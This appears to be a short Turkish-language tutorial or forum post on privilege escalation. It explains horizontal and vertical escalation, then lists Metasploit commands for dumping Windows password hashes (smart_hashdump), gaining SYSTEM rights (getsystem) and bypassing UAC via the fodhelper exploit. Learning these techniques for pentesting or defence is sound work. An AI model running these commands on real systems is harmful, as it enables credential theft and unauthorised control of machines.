Ayrıcalık yükseltmesi, bir kullanıcının daha yüksek yetkilerle sistem kaynaklarına erişmesini sağlayan bir süreçtir. Bu, yetkisiz bir kullanıcının sisteme daha yüksek erişim izni elde etmeyi denemesiyle gerçekleşir. İki temel türü vardır:
Yatay Ayrıcalık Yükseltmesi: Aynı seviyedeki kullanıcı hesapları arasında erişim sağlama.
Dikey Ayrıcalık Yükseltmesi: Daha yüksek yetkilere sahip kullanıcı hesaplarına erişim sağlama.
Yatay Ayrıcalık Yükseltmesi
Yatay ayrıcalık yükseltmesi, yetkisiz bir kullanıcının, benzer erişim izinlerine sahip yetkili bir kullanıcının kaynaklarına, işlevlerine ve diğer ayrıcalıklara erişmeye çalışmasıdır. Bu genellikle benzer seviyede başka kullanıcıların kaynaklarını ele geçirmeyi içerir.
Dikey Ayrıcalık Yükseltmesi
Dikey ayrıcalık yükseltmesi, yetkisiz bir kullanıcının daha yüksek yetkilere sahip bir kullanıcının kaynaklarına ve işlevlerine erişmeye çalışmasıdır. Bu, genellikle yönetici yetkileri gerektiren bir saldırıdır.
Ayrıcalık Yükseltmesi İçin Metasploit Kullanımı
Hashdump ve Sistem Yetkiler
run post/windows/gather/smart_hashdump
getsystem -t 1
run post/windows/gather/smart_hashdump: Sistem hash'lerini toplar.
getsystem -t 1: Hizmet adıyla kopyalanmış yetkilerle sistem ayrıcalıklarını yükseltir.
UAC Bypass ile Ayrıcalık Yükseltme
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run
use exploit/windows/local/bypassuac_fodhelper: UAC'yi atlamak için bir exploit kullanır.
set SESSION 1: Önceki oturum ID'sini belirtir.
run: Exploiti çalıştırır.
Elinize sağlık hocam.